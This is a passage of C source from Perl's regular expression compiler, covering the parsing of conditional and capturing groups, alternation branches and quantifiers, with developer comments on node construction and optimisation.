cb = &pRExC_state->code_blocks->cb[pRExC_state->code_index];
RExC_parse = RExC_start + cb->end;
o = cb->block;
if (cb->src_regex) {
n = add_data(pRExC_state, STR_WITH_LEN("rl"));
RExC_rxi->data->data[n] =
(void*)SvREFCNT_inc((SV*)cb->src_regex);
RExC_rxi->data->data[n+1] = (void*)o;
}
else {
n = add_data(pRExC_state,
(RExC_pm_flags & PMf_HAS_CV) ? "L" : "l", 1);
RExC_rxi->data->data[n] = (void*)o;
}
pRExC_state->code_index++;
nextchar(pRExC_state);
if (is_logical) {
regnode_offset eval;
ret = reg_node(pRExC_state, LOGICAL);
eval = reg2Lanode(pRExC_state, EVAL,
n,
/* for later propagation into (??{})
* return value */
RExC_flags & RXf_PMf_COMPILETIME
);
FLAGS(REGNODE_p(ret)) = 2;
if (! REGTAIL(pRExC_state, ret, eval)) {
REQUIRE_BRANCHJ(flagp, 0);
}
/* deal with the length of this later - MJD */
return ret;
}
ret = reg2Lanode(pRExC_state, EVAL, n, 0);
Set_Node_Length(REGNODE_p(ret), RExC_parse - parse_start + 1);
Set_Node_Offset(REGNODE_p(ret), parse_start);
return ret;
}
case '(': /* (?(?{...})...) and (?(?=...)...) */
{
int is_define= 0;
const int DEFINE_len = sizeof("DEFINE") - 1;
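/* The dispatch below recognizes the possible forms of a conditional's
 * test: a zero-width assertion such as (?(?=...)...) or (?(*pla:...)...),
 * a named group test (?(<NAME>)...) or (?('NAME')...), (?(DEFINE)...),
 * a recursion test (?(R)...), (?(R1)...) or (?(R&NAME)...), and a plain
 * numbered group test such as (?(1)...). */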
if ( RExC_parse < RExC_end - 1
&& ( ( RExC_parse[0] == '?' /* (?(?...)) */
&& ( RExC_parse[1] == '='
|| RExC_parse[1] == '!'
|| RExC_parse[1] == '<'
|| RExC_parse[1] == '{'))
|| ( RExC_parse[0] == '*' /* (?(*...)) */
&& ( memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"pla:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"plb:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"nla:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"nlb:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"positive_lookahead:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"positive_lookbehind:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"negative_lookahead:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"negative_lookbehind:"))))
) { /* Lookahead or eval. */
I32 flag;
regnode_offset tail;
ret = reg_node(pRExC_state, LOGICAL);
FLAGS(REGNODE_p(ret)) = 1;
tail = reg(pRExC_state, 1, &flag, depth+1);
RETURN_FAIL_ON_RESTART(flag, flagp);
if (! REGTAIL(pRExC_state, ret, tail)) {
REQUIRE_BRANCHJ(flagp, 0);
}
goto insert_if;
}
else if ( RExC_parse[0] == '<' /* (?(<NAME>)...) */
|| RExC_parse[0] == '\'' ) /* (?('NAME')...) */
{
char ch = RExC_parse[0] == '<' ? '>' : '\'';
char *name_start= RExC_parse++;
U32 num = 0;
SV *sv_dat=reg_scan_name(pRExC_state, REG_RSN_RETURN_DATA);
if ( RExC_parse == name_start
|| RExC_parse >= RExC_end
|| *RExC_parse != ch)
{
vFAIL2("Sequence (?(%c... not terminated",
(ch == '>' ? '<' : ch));
}
RExC_parse++;
if (sv_dat) {
num = add_data( pRExC_state, STR_WITH_LEN("S"));
RExC_rxi->data->data[num]=(void*)sv_dat;
SvREFCNT_inc_simple_void_NN(sv_dat);
}
ret = reganode(pRExC_state, NGROUPP, num);
goto insert_if_check_paren;
}
else if (memBEGINs(RExC_parse,
(STRLEN) (RExC_end - RExC_parse),
"DEFINE"))
{
ret = reganode(pRExC_state, DEFINEP, 0);
RExC_parse += DEFINE_len;
is_define = 1;
goto insert_if_check_paren;
}
else if (RExC_parse[0] == 'R') {
RExC_parse++;
/* parno == 0 => /(?(R)YES|NO)/ "in any form of recursion OR eval"
* parno == 1 => /(?(R0)YES|NO)/ "in GOSUB (?0) / (?R)"
* parno == 2 => /(?(R1)YES|NO)/ "in GOSUB (?1) (parno-1)"
*/
parno = 0;
if (RExC_parse[0] == '0') {
parno = 1;
RExC_parse++;
}
else if (inRANGE(RExC_parse[0], '1', '9')) {
UV uv;
endptr = RExC_end;
if (grok_atoUV(RExC_parse, &uv, &endptr)
&& uv <= I32_MAX
) {
parno = (I32)uv + 1;
RExC_parse = (char*)endptr;
}
/* else "Switch condition not recognized" below */
} else if (RExC_parse[0] == '&') {
SV *sv_dat;
RExC_parse++;
sv_dat = reg_scan_name(pRExC_state,
REG_RSN_RETURN_DATA);
if (sv_dat)
parno = 1 + *((I32 *)SvPVX(sv_dat));
}
ret = reganode(pRExC_state, INSUBP, parno);
goto insert_if_check_paren;
}
else if (inRANGE(RExC_parse[0], '1', '9')) {
/* (?(1)...) */
char c;
UV uv;
endptr = RExC_end;
if (grok_atoUV(RExC_parse, &uv, &endptr)
&& uv <= I32_MAX
) {
parno = (I32)uv;
RExC_parse = (char*)endptr;
}
else {
vFAIL("panic: grok_atoUV returned FALSE");
}
ret = reganode(pRExC_state, GROUPP, parno);
insert_if_check_paren:
if (UCHARAT(RExC_parse) != ')') {
RExC_parse += UTF
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
vFAIL("Switch condition not recognized");
}
nextchar(pRExC_state);
insert_if:
if (! REGTAIL(pRExC_state, ret, reganode(pRExC_state,
IFTHEN, 0)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
br = regbranch(pRExC_state, &flags, 1, depth+1);
if (br == 0) {
RETURN_FAIL_ON_RESTART(flags,flagp);
FAIL2("panic: regbranch returned failure, flags=%#" UVxf,
(UV) flags);
} else
if (! REGTAIL(pRExC_state, br, reganode(pRExC_state,
LONGJMP, 0)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
c = UCHARAT(RExC_parse);
nextchar(pRExC_state);
if (flags&HASWIDTH)
*flagp |= HASWIDTH;
if (c == '|') {
if (is_define)
vFAIL("(?(DEFINE)....) does not allow branches");
/* Fake one for optimizer. */
lastbr = reganode(pRExC_state, IFTHEN, 0);
if (!regbranch(pRExC_state, &flags, 1, depth+1)) {
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: regbranch returned failure, flags=%#" UVxf,
(UV) flags);
}
if (! REGTAIL(pRExC_state, ret, lastbr)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (flags&HASWIDTH)
*flagp |= HASWIDTH;
c = UCHARAT(RExC_parse);
nextchar(pRExC_state);
}
else
lastbr = 0;
if (c != ')') {
if (RExC_parse >= RExC_end)
vFAIL("Switch (?(condition)... not terminated");
else
vFAIL("Switch (?(condition)... contains too many branches");
}
ender = reg_node(pRExC_state, TAIL);
if (! REGTAIL(pRExC_state, br, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (lastbr) {
if (! REGTAIL(pRExC_state, lastbr, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (! REGTAIL(pRExC_state,
REGNODE_OFFSET(
NEXTOPER(
NEXTOPER(REGNODE_p(lastbr)))),
ender))
{
REQUIRE_BRANCHJ(flagp, 0);
}
}
else
if (! REGTAIL(pRExC_state, ret, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
#if 0 /* Removing this doesn't cause failures in the test suite -- khw */
RExC_size++; /* XXX WHY do we need this?!!
For large programs it seems to be required
but I can't figure out why. -- dmq*/
#endif
return ret;
}
RExC_parse += UTF
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
vFAIL("Unknown switch condition (?(...))");
}
case '[': /* (?[ ... ]) */
return handle_regex_sets(pRExC_state, NULL, flagp, depth+1,
oregcomp_parse);
case 0: /* A NUL */
RExC_parse--; /* for vFAIL to print correctly */
vFAIL("Sequence (? incomplete");
break;
case ')':
if (RExC_strict) { /* [perl #132851] */
ckWARNreg(RExC_parse, "Empty (?) without any modifiers");
}
/* FALLTHROUGH */
default: /* e.g., (?i) */
RExC_parse = (char *) seqstart + 1;
parse_flags:
parse_lparen_question_flags(pRExC_state);
if (UCHARAT(RExC_parse) != ':') {
if (RExC_parse < RExC_end)
nextchar(pRExC_state);
*flagp = TRYAGAIN;
return 0;
}
paren = ':';
nextchar(pRExC_state);
ret = 0;
goto parse_rest;
} /* end switch */
}
else {
if (*RExC_parse == '{') {
ckWARNregdep(RExC_parse + 1,
"Unescaped left brace in regex is "
"deprecated here (and will be fatal "
"in Perl 5.32), passed through");
}
/* Not bothering to indent here, as the above 'else' is temporary
* */
if (!(RExC_flags & RXf_PMf_NOCAPTURE)) { /* (...) */
capturing_parens:
parno = RExC_npar;
RExC_npar++;
if (! ALL_PARENS_COUNTED) {
/* If we are in our first pass through (and maybe only pass),
* we need to allocate memory for the capturing parentheses
* data structures.
*/
if (!RExC_parens_buf_size) {
/* first guess at number of parens we might encounter */
RExC_parens_buf_size = 10;
/* setup RExC_open_parens, which holds the address of each
* OPEN tag, and to make things simpler for the 0 index the
* start of the program - this is used later for offsets */
Newxz(RExC_open_parens, RExC_parens_buf_size,
regnode_offset);
RExC_open_parens[0] = 1; /* +1 for REG_MAGIC */
/* setup RExC_close_parens, which holds the address of each
* CLOSE tag, and to make things simpler for the 0 index
* the end of the program - this is used later for offsets
* */
Newxz(RExC_close_parens, RExC_parens_buf_size,
regnode_offset);
/* we don't know where the end op starts yet, so we don't need to
* set RExC_close_parens[0] like we do RExC_open_parens[0]
* above */
}
else if (RExC_npar > RExC_parens_buf_size) {
I32 old_size = RExC_parens_buf_size;
RExC_parens_buf_size *= 2;
Renew(RExC_open_parens, RExC_parens_buf_size,
regnode_offset);
Zero(RExC_open_parens + old_size,
RExC_parens_buf_size - old_size, regnode_offset);
Renew(RExC_close_parens, RExC_parens_buf_size,
regnode_offset);
Zero(RExC_close_parens + old_size,
RExC_parens_buf_size - old_size, regnode_offset);
}
}
ret = reganode(pRExC_state, OPEN, parno);
if (!RExC_nestroot)
RExC_nestroot = parno;
if (RExC_open_parens && !RExC_open_parens[parno])
{
DEBUG_OPTIMISE_MORE_r(Perl_re_printf( aTHX_
"%*s%*s Setting open paren #%" IVdf " to %d\n",
22, "| |", (int)(depth * 2 + 1), "",
(IV)parno, ret));
RExC_open_parens[parno]= ret;
}
Set_Node_Length(REGNODE_p(ret), 1); /* MJD */
Set_Node_Offset(REGNODE_p(ret), RExC_parse); /* MJD */
is_open = 1;
} else {
/* with RXf_PMf_NOCAPTURE treat (...) as (?:...) */
paren = ':';
ret = 0;
}
}
}
else /* ! paren */
ret = 0;
parse_rest:
/* Pick up the branches, linking them together. */
parse_start = RExC_parse; /* MJD */
br = regbranch(pRExC_state, &flags, 1, depth+1);
/* branch_len = (paren != 0); */
if (br == 0) {
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: regbranch returned failure, flags=%#" UVxf, (UV) flags);
}
if (*RExC_parse == '|') {
if (RExC_use_BRANCHJ) {
reginsert(pRExC_state, BRANCHJ, br, depth+1);
}
else { /* MJD */
reginsert(pRExC_state, BRANCH, br, depth+1);
Set_Node_Length(REGNODE_p(br), paren != 0);
Set_Node_Offset_To_R(br, parse_start-RExC_start);
}
have_branch = 1;
}
else if (paren == ':') {
*flagp |= flags&SIMPLE;
}
if (is_open) { /* Starts with OPEN. */
if (! REGTAIL(pRExC_state, ret, br)) { /* OPEN -> first. */
REQUIRE_BRANCHJ(flagp, 0);
}
}
else if (paren != '?') /* Not Conditional */
ret = br;
*flagp |= flags & (SPSTART | HASWIDTH | POSTPONED);
lastbr = br;
while (*RExC_parse == '|') {
if (RExC_use_BRANCHJ) {
bool shut_gcc_up;
ender = reganode(pRExC_state, LONGJMP, 0);
/* Append to the previous. */
shut_gcc_up = REGTAIL(pRExC_state,
REGNODE_OFFSET(NEXTOPER(NEXTOPER(REGNODE_p(lastbr)))),
ender);
PERL_UNUSED_VAR(shut_gcc_up);
}
nextchar(pRExC_state);
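/* For a branch reset group, (?|...), each alternative restarts capture
 * numbering at the number the group started with (freeze_paren), and
 * after_freeze tracks the highest number any alternative reached so
 * numbering can resume correctly after the group closes. */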
if (freeze_paren) {
if (RExC_npar > after_freeze)
after_freeze = RExC_npar;
RExC_npar = freeze_paren;
}
br = regbranch(pRExC_state, &flags, 0, depth+1);
if (br == 0) {
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: regbranch returned failure, flags=%#" UVxf, (UV) flags);
}
if (! REGTAIL(pRExC_state, lastbr, br)) { /* BRANCH -> BRANCH. */
REQUIRE_BRANCHJ(flagp, 0);
}
lastbr = br;
*flagp |= flags & (SPSTART | HASWIDTH | POSTPONED);
}
if (have_branch || paren != ':') {
regnode * br;
/* Make a closing node, and hook it on the end. */
switch (paren) {
case ':':
ender = reg_node(pRExC_state, TAIL);
break;
case 1: case 2:
ender = reganode(pRExC_state, CLOSE, parno);
if ( RExC_close_parens ) {
DEBUG_OPTIMISE_MORE_r(Perl_re_printf( aTHX_
"%*s%*s Setting close paren #%" IVdf " to %d\n",
22, "| |", (int)(depth * 2 + 1), "",
(IV)parno, ender));
RExC_close_parens[parno]= ender;
if (RExC_nestroot == parno)
RExC_nestroot = 0;
}
Set_Node_Offset(REGNODE_p(ender), RExC_parse+1); /* MJD */
Set_Node_Length(REGNODE_p(ender), 1); /* MJD */
break;
case 's':
ender = reg_node(pRExC_state, SRCLOSE);
RExC_in_script_run = 0;
break;
case '<':
case 'a':
case 'A':
case 'b':
case 'B':
case ',':
case '=':
case '!':
*flagp &= ~HASWIDTH;
/* FALLTHROUGH */
case 't': /* aTomic */
case '>':
ender = reg_node(pRExC_state, SUCCEED);
break;
case 0:
ender = reg_node(pRExC_state, END);
assert(!RExC_end_op); /* there can only be one! */
RExC_end_op = REGNODE_p(ender);
if (RExC_close_parens) {
DEBUG_OPTIMISE_MORE_r(Perl_re_printf( aTHX_
"%*s%*s Setting close paren #0 (END) to %d\n",
22, "| |", (int)(depth * 2 + 1), "",
ender));
RExC_close_parens[0]= ender;
}
break;
}
DEBUG_PARSE_r({
DEBUG_PARSE_MSG("lsbr");
regprop(RExC_rx, RExC_mysv1, REGNODE_p(lastbr), NULL, pRExC_state);
regprop(RExC_rx, RExC_mysv2, REGNODE_p(ender), NULL, pRExC_state);
Perl_re_printf( aTHX_ "~ tying lastbr %s (%" IVdf ") to ender %s (%" IVdf ") offset %" IVdf "\n",
SvPV_nolen_const(RExC_mysv1),
(IV)lastbr,
SvPV_nolen_const(RExC_mysv2),
(IV)ender,
(IV)(ender - lastbr)
);
});
if (! REGTAIL(pRExC_state, lastbr, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (have_branch) {
char is_nothing= 1;
if (depth==1)
RExC_seen |= REG_TOP_LEVEL_BRANCHES_SEEN;
/* Hook the tails of the branches to the closing node. */
for (br = REGNODE_p(ret); br; br = regnext(br)) {
const U8 op = PL_regkind[OP(br)];
if (op == BRANCH) {
if (! REGTAIL_STUDY(pRExC_state,
REGNODE_OFFSET(NEXTOPER(br)),
ender))
{
REQUIRE_BRANCHJ(flagp, 0);
}
if ( OP(NEXTOPER(br)) != NOTHING
|| regnext(NEXTOPER(br)) != REGNODE_p(ender))
is_nothing= 0;
}
else if (op == BRANCHJ) {
bool shut_gcc_up = REGTAIL_STUDY(pRExC_state,
REGNODE_OFFSET(NEXTOPER(NEXTOPER(br))),
ender);
PERL_UNUSED_VAR(shut_gcc_up);
/* for now we always disable this optimisation * /
if ( OP(NEXTOPER(NEXTOPER(br))) != NOTHING
|| regnext(NEXTOPER(NEXTOPER(br))) != REGNODE_p(ender))
*/
is_nothing= 0;
}
}
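/* If every branch turned out to be an empty NOTHING that falls straight
 * through to the ender, the whole group matches the empty string and can
 * itself be collapsed: the head node becomes a NOTHING and any
 * intervening nodes are marked OPTIMIZED (or the emit pointer is simply
 * rewound when the ender is a TAIL). */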
if (is_nothing) {
regnode * ret_as_regnode = REGNODE_p(ret);
br= PL_regkind[OP(ret_as_regnode)] != BRANCH
? regnext(ret_as_regnode)
: ret_as_regnode;
DEBUG_PARSE_r({
DEBUG_PARSE_MSG("NADA");
regprop(RExC_rx, RExC_mysv1, ret_as_regnode,
NULL, pRExC_state);
regprop(RExC_rx, RExC_mysv2, REGNODE_p(ender),
NULL, pRExC_state);
Perl_re_printf( aTHX_ "~ converting ret %s (%" IVdf ") to ender %s (%" IVdf ") offset %" IVdf "\n",
SvPV_nolen_const(RExC_mysv1),
(IV)REG_NODE_NUM(ret_as_regnode),
SvPV_nolen_const(RExC_mysv2),
(IV)ender,
(IV)(ender - ret)
);
});
OP(br)= NOTHING;
if (OP(REGNODE_p(ender)) == TAIL) {
NEXT_OFF(br)= 0;
RExC_emit= REGNODE_OFFSET(br) + 1;
} else {
regnode *opt;
for ( opt= br + 1; opt < REGNODE_p(ender) ; opt++ )
OP(opt)= OPTIMIZED;
NEXT_OFF(br)= REGNODE_p(ender) - br;
}
}
}
}
{
const char *p;
/* Even/odd or x=don't care: 010101x10x */
static const char parens[] = "=!aA<,>Bbt";
/* flag below is set to 0 up through 'A'; 1 for larger */
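/* What the table encodes: even positions map to IFMATCH (the positive
 * assertions '=', 'a', '<', 'b', plus '>'), odd positions to UNLESSM
 * (the negative assertions '!', 'A', ',', 'B', plus 't'); positions
 * after 'A' are the lookbehinds, so they get flag 1.  The '>' and 't'
 * atomic cases are then overridden to SUSPEND with flag 0. */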
if (paren && (p = strchr(parens, paren))) {
U8 node = ((p - parens) % 2) ? UNLESSM : IFMATCH;
int flag = (p - parens) > 3;
if (paren == '>' || paren == 't') {
node = SUSPEND, flag = 0;
}
reginsert(pRExC_state, node, ret, depth+1);
Set_Node_Cur_Length(REGNODE_p(ret), parse_start);
Set_Node_Offset(REGNODE_p(ret), parse_start + 1);
FLAGS(REGNODE_p(ret)) = flag;
if (! REGTAIL_STUDY(pRExC_state, ret, reg_node(pRExC_state, TAIL)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
}
}
/* Check for proper termination. */
if (paren) {
/* restore original flags, but keep (?p) and, if we've encountered
* something in the parse that changes /d rules into /u, keep the /u */
RExC_flags = oregflags | (RExC_flags & RXf_PMf_KEEPCOPY);
if (DEPENDS_SEMANTICS && RExC_uni_semantics) {
set_regex_charset(&RExC_flags, REGEX_UNICODE_CHARSET);
}
if (RExC_parse >= RExC_end || UCHARAT(RExC_parse) != ')') {
RExC_parse = oregcomp_parse;
vFAIL("Unmatched (");
}
nextchar(pRExC_state);
}
else if (!paren && RExC_parse < RExC_end) {
if (*RExC_parse == ')') {
RExC_parse++;
vFAIL("Unmatched )");
}
else
FAIL("Junk on end of regexp"); /* "Can't happen". */
NOT_REACHED; /* NOTREACHED */
}
if (RExC_in_lookbehind) {
RExC_in_lookbehind--;
}
if (after_freeze > RExC_npar)
RExC_npar = after_freeze;
return(ret);
}
/*
- regbranch - one alternative of an | operator
*
* Implements the concatenation operator.
*
* On success, returns the offset at which any next node should be placed into
* the regex engine program being compiled.
*
* Returns 0 otherwise, setting flagp to RESTART_PARSE if the parse needs
* to be restarted, or'd with NEED_UTF8 if the pattern needs to be upgraded to
* UTF-8
*/
STATIC regnode_offset
S_regbranch(pTHX_ RExC_state_t *pRExC_state, I32 *flagp, I32 first, U32 depth)
{
regnode_offset ret;
regnode_offset chain = 0;
regnode_offset latest;
I32 flags = 0, c = 0;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGBRANCH;
DEBUG_PARSE("brnc");
if (first)
ret = 0;
else {
if (RExC_use_BRANCHJ)
ret = reganode(pRExC_state, BRANCHJ, 0);
else {
ret = reg_node(pRExC_state, BRANCH);
Set_Node_Length(REGNODE_p(ret), 1);
}
}
*flagp = WORST; /* Tentatively. */
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force to /x */ );
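/* Loop over the pieces of this alternative, stopping at '|' or ')'.
 * Each regpiece() result is spliced onto the end of the chain built so
 * far with REGTAIL(), implementing concatenation. */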
while (RExC_parse < RExC_end && *RExC_parse != '|' && *RExC_parse != ')') {
flags &= ~TRYAGAIN;
latest = regpiece(pRExC_state, &flags, depth+1);
if (latest == 0) {
if (flags & TRYAGAIN)
continue;
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: regpiece returned failure, flags=%#" UVxf, (UV) flags);
}
else if (ret == 0)
ret = latest;
*flagp |= flags&(HASWIDTH|POSTPONED);
if (chain == 0) /* First piece. */
*flagp |= flags&SPSTART;
else {
/* FIXME adding one for every branch after the first is probably
* excessive now that we have TRIE support. (hv) */
MARK_NAUGHTY(1);
if (! REGTAIL(pRExC_state, chain, latest)) {
/* XXX We could just redo this branch, but figuring out what
* bookkeeping needs to be reset is a pain, and it's likely
* that other branches that goto END will also be too large */
REQUIRE_BRANCHJ(flagp, 0);
}
}
chain = latest;
c++;
}
if (chain == 0) { /* Loop ran zero times. */
chain = reg_node(pRExC_state, NOTHING);
if (ret == 0)
ret = chain;
}
if (c == 1) {
*flagp |= flags&SIMPLE;
}
return ret;
}
/*
- regpiece - something followed by possible quantifier * + ? {n,m}
*
* Note that the branching code sequences used for ? and the general cases
* of * and + are somewhat optimized: they use the same NOTHING node as
* both the endmarker for their branch list and the body of the last branch.
* It might seem that this node could be dispensed with entirely, but the
* endmarker role is not redundant.
*
* On success, returns the offset at which any next node should be placed into
* the regex engine program being compiled.
*
* Returns 0 otherwise, with *flagp set to indicate why:
* TRYAGAIN if regatom() returns 0 with TRYAGAIN.
* RESTART_PARSE if the parse needs to be restarted, or'd with
* NEED_UTF8 if the pattern needs to be upgraded to UTF-8.
*/
STATIC regnode_offset
S_regpiece(pTHX_ RExC_state_t *pRExC_state, I32 *flagp, U32 depth)
{
regnode_offset ret;
char op;
char *next;
I32 flags;
const char * const origparse = RExC_parse;
I32 min;
I32 max = REG_INFTY;
#ifdef RE_TRACK_PATTERN_OFFSETS
char *parse_start;
#endif
const char *maxpos = NULL;
UV uv;
/* Save the original in case we change the emitted regop to a FAIL. */
const regnode_offset orig_emit = RExC_emit;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGPIECE;
DEBUG_PARSE("piec");
ret = regatom(pRExC_state, &flags, depth+1);
if (ret == 0) {
RETURN_FAIL_ON_RESTART_OR_FLAGS(flags, flagp, TRYAGAIN);
FAIL2("panic: regatom returned failure, flags=%#" UVxf, (UV) flags);
}
op = *RExC_parse;
if (op == '{' && regcurly(RExC_parse)) {
maxpos = NULL;
#ifdef RE_TRACK_PATTERN_OFFSETS
parse_start = RExC_parse; /* MJD */
#endif
next = RExC_parse + 1;
while (isDIGIT(*next) || *next == ',') {
if (*next == ',') {
if (maxpos)
break;
else
maxpos = next;
}
next++;
}
if (*next == '}') { /* got one */
const char* endptr;
if (!maxpos)
maxpos = next;
RExC_parse++;
if (isDIGIT(*RExC_parse)) {
endptr = RExC_end;
if (!grok_atoUV(RExC_parse, &uv, &endptr))
vFAIL("Invalid quantifier in {,}");
if (uv >= REG_INFTY)
vFAIL2("Quantifier in {,} bigger than %d", REG_INFTY - 1);
min = (I32)uv;
} else {
min = 0;
}
if (*maxpos == ',')
maxpos++;
else
maxpos = RExC_parse;
if (isDIGIT(*maxpos)) {
endptr = RExC_end;
if (!grok_atoUV(maxpos, &uv, &endptr))
vFAIL("Invalid quantifier in {,}");
if (uv >= REG_INFTY)
vFAIL2("Quantifier in {,} bigger than %d", REG_INFTY - 1);
max = (I32)uv;
} else {
max = REG_INFTY; /* meaning "infinity" */
}
RExC_parse = next;
nextchar(pRExC_state);
if (max < min) { /* If it can't match, warn and optimize to fail
unconditionally */
reginsert(pRExC_state, OPFAIL, orig_emit, depth+1);
ckWARNreg(RExC_parse, "Quantifier {n,m} with n > m can't match");
NEXT_OFF(REGNODE_p(orig_emit)) =
regarglen[OPFAIL] + NODE_STEP_REGNODE;
return ret;
}
else if (min == max && *RExC_parse == '?')
{
ckWARN2reg(RExC_parse + 1,
"Useless use of greediness modifier '%c'",
*RExC_parse);
}
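/* do_curly: emit the quantifier itself.  For a SIMPLE atom, {0,} and
 * {1,} become the cheap STAR and PLUS nodes and anything else becomes a
 * CURLY; for a non-simple atom the target is wrapped in the heavier
 * CURLYX/WHILEM machinery.  min and max are stored in the node's two
 * argument fields below. */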
do_curly:
if ((flags&SIMPLE)) {
if (min == 0 && max == REG_INFTY) {
reginsert(pRExC_state, STAR, ret, depth+1);
MARK_NAUGHTY(4);
RExC_seen |= REG_UNBOUNDED_QUANTIFIER_SEEN;
goto nest_check;
}
if (min == 1 && max == REG_INFTY) {
reginsert(pRExC_state, PLUS, ret, depth+1);
MARK_NAUGHTY(3);
RExC_seen |= REG_UNBOUNDED_QUANTIFIER_SEEN;
goto nest_check;
}
MARK_NAUGHTY_EXP(2, 2);
reginsert(pRExC_state, CURLY, ret, depth+1);
Set_Node_Offset(REGNODE_p(ret), parse_start+1); /* MJD */
Set_Node_Cur_Length(REGNODE_p(ret), parse_start);
}
else {
const regnode_offset w = reg_node(pRExC_state, WHILEM);
FLAGS(REGNODE_p(w)) = 0;
if (! REGTAIL(pRExC_state, ret, w)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (RExC_use_BRANCHJ) {
reginsert(pRExC_state, LONGJMP, ret, depth+1);
reginsert(pRExC_state, NOTHING, ret, depth+1);
NEXT_OFF(REGNODE_p(ret)) = 3; /* Go over LONGJMP. */
}
reginsert(pRExC_state, CURLYX, ret, depth+1);
/* MJD hk */
Set_Node_Offset(REGNODE_p(ret), parse_start+1);
Set_Node_Length(REGNODE_p(ret),
op == '{' ? (RExC_parse - parse_start) : 1);
if (RExC_use_BRANCHJ)
NEXT_OFF(REGNODE_p(ret)) = 3; /* Go over NOTHING to
LONGJMP. */
if (! REGTAIL(pRExC_state, ret, reg_node(pRExC_state,
NOTHING)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
RExC_whilem_seen++;
MARK_NAUGHTY_EXP(1, 4); /* compound interest */
}
FLAGS(REGNODE_p(ret)) = 0;
if (min > 0)
*flagp = WORST;
if (max > 0)
*flagp |= HASWIDTH;
ARG1_SET(REGNODE_p(ret), (U16)min);
ARG2_SET(REGNODE_p(ret), (U16)max);
if (max == REG_INFTY)
RExC_seen |= REG_UNBOUNDED_QUANTIFIER_SEEN;
goto nest_check;
}
}
if (!ISMULT1(op)) {
*flagp = flags;
return(ret);
}
#if 0 /* Now runtime fix should be reliable. */
/* if this is reinstated, don't forget to put this back into perldiag:
=item Regexp *+ operand could be empty at {#} in regex m/%s/
(F) The part of the regexp subject to either the * or + quantifier
could match an empty string. The {#} shows in the regular
expression about where the problem was discovered.
*/
if (!(flags&HASWIDTH) && op != '?')
vFAIL("Regexp *+ operand could be empty");
#endif
#ifdef RE_TRACK_PATTERN_OFFSETS
parse_start = RExC_parse;
#endif
nextchar(pRExC_state);
*flagp = (op != '+') ? (WORST|SPSTART|HASWIDTH) : (WORST|HASWIDTH);
if (op == '*') {
min = 0;
goto do_curly;
}
else if (op == '+') {
min = 1;
goto do_curly;
}
else if (op == '?') {
min = 0; max = 1;
goto do_curly;
}
nest_check:
if (!(flags&(HASWIDTH|POSTPONED)) && max > REG_INFTY/3) {
ckWARN2reg(RExC_parse,
"%" UTF8f " matches null string many times",
UTF8fARG(UTF, (RExC_parse >= origparse
? RExC_parse - origparse
: 0),
origparse));
}
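/* A trailing '?' makes the quantifier minimal (non-greedy): a MINMOD
 * node is inserted in front of it.  A trailing '+' makes it possessive:
 * the quantified expression is wrapped so it behaves as if enclosed in
 * an atomic (?>...) group, via SUSPEND ... SUCCEED/TAIL nodes. */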
if (*RExC_parse == '?') {
nextchar(pRExC_state);
reginsert(pRExC_state, MINMOD, ret, depth+1);
if (! REGTAIL(pRExC_state, ret, ret + NODE_STEP_REGNODE)) {
REQUIRE_BRANCHJ(flagp, 0);
}
}
else if (*RExC_parse == '+') {
regnode_offset ender;
nextchar(pRExC_state);
ender = reg_node(pRExC_state, SUCCEED);
if (! REGTAIL(pRExC_state, ret, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
reginsert(pRExC_state, SUSPEND, ret, depth+1);
ender = reg_node(pRExC_state, TAIL);
if (! REGTAIL(pRExC_state, ret, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
}
if (ISMULT2(RExC_parse)) {
RExC_parse++;
vFAIL("Nested quantifiers");
}
return(ret);
}
STATIC bool
S_grok_bslash_N(pTHX_ RExC_state_t *pRExC_state,
regnode_offset * node_p,
UV * code_point_p,
int * cp_count,
I32 * flagp,
const bool strict,
const U32 depth
)
{
/* This routine teases apart the various meanings of \N and returns
* accordingly. The input parameters constrain which meaning(s) is/are valid
* in the current context.
*
* Exactly one of <node_p> and <code_point_p> must be non-NULL.
*
* If <code_point_p> is not NULL, the context is expecting the result to be a
* single code point. If this \N instance turns out to be a single code point,
* the function returns TRUE and sets *code_point_p to that code point.
*
* If <node_p> is not NULL, the context is expecting the result to be one of
* the things representable by a regnode. If this \N instance turns out to be
* one such, the function generates the regnode, returns TRUE and sets *node_p
* to point to the offset of that regnode into the regex engine program being
* compiled.
*
* If this instance of \N isn't legal in any context, this function will
* generate a fatal error and not return.
*
* On input, RExC_parse should point to the first char following the \N at the
* time of the call. On successful return, RExC_parse will have been updated
* to point to just after the sequence identified by this routine. Also
* *flagp has been updated as needed.
*
* When there is some problem with the current context and this \N instance,
* the function returns FALSE, without advancing RExC_parse or setting
